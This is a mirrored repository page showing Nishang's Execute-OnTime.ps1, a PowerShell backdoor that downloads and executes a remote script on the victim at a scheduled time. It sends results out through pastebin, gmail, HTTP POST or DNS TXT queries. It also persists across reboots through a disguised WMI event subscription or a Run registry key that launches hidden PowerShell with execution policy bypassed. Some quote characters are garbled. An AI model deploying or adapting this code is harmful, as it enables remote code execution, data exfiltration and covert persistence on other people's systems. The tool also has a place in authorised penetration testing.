Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-23 03:33:03 +00:00
Code Issues Projects Releases Packages Wiki Activity
webshell/aspx/nishang/Backdoors/Execute-OnTime.ps1
tennc 300ccb3c8d update Antak-WebShell aspx 
Antak-WebShell
2014-07-30 17:50:54 +08:00

305 lines
11 KiB
PowerShell
Raw Blame History

<#
.SYNOPSIS
Nishang Payload which waits till given time to execute a script.
.DESCRIPTION
This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER PayloadURL
The URL from where the file would be downloaded.
.PARAMETER time
The Time when the payload will be executed (in 24 hour format e.g. 23:21).
.PARAMETER CheckURL
The URL which the payload would check for instructions to stop.
.PARAMETER StopString
The string which if found at CheckURL will stop the payload.
.PARAMETER persist
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
PARAMETER exfil
Use this parameter to use exfiltration methods for returning the results.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.EXAMPLE
PS > Execute-OnTime http://example.com/script.ps1 hh:mm http://pastebin.com/raw.php?i=Zhyf8rwh stoppayload
EXAMPLE
PS > Execute-OnTime http://pastebin.com/raw.php?i=Zhyf8rwh hh:mm http://pastebin.com/raw.php?i=jqP2vJ3x stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php>
Use above when using the payload from non-interactive shells.
.EXAMPLE
PS > Execute-OnTime -persist
Use above for reboot persistence.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function Execute-OnTime
{
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
$persist,
[Parameter(Parametersetname="exfil")]
[Switch]
$exfil,
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[String]
$PayloadURL,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[String]
$time,
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[String]
$StopString,
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[String]
$AuthNS = "null"
)
$body = @'
function Logic-Execute-OnTime ($PayloadURL, $time, $CheckURL, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
{
while($true)
{
$exec = 0
start-sleep -seconds 5
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
$systime = Get-Date -UFormat %R
if ($systime -match $time)
{
$pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
$pastevalue
$exec++
if ($exfil -eq $True)
{
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
}
if ($exec -eq 1)
{
Start-Sleep -Seconds 60
}
}
elseif ($filecontent -eq $StopString)
{
break
}
}
}
'@
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$AuthNS)
{
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = <20>smtp.gmail.com<6F>
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential(<28>$username<6D>, <20>$password<72>);
$msg.From = <20>$username@gmail.com<6F>
$msg.To.Add(<28>$username@gmail.com<6F>)
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
$Data
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$lengthofsubstr = 0
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}
'@
$modulename = "Execute-OnTime.ps1"
if($persist -eq $True)
{
$name = "persist.vbs"
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}
else
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
Invoke-Expression $env:TEMP\$modulename
}
}
Reference in a new issue View git blame Copy permalink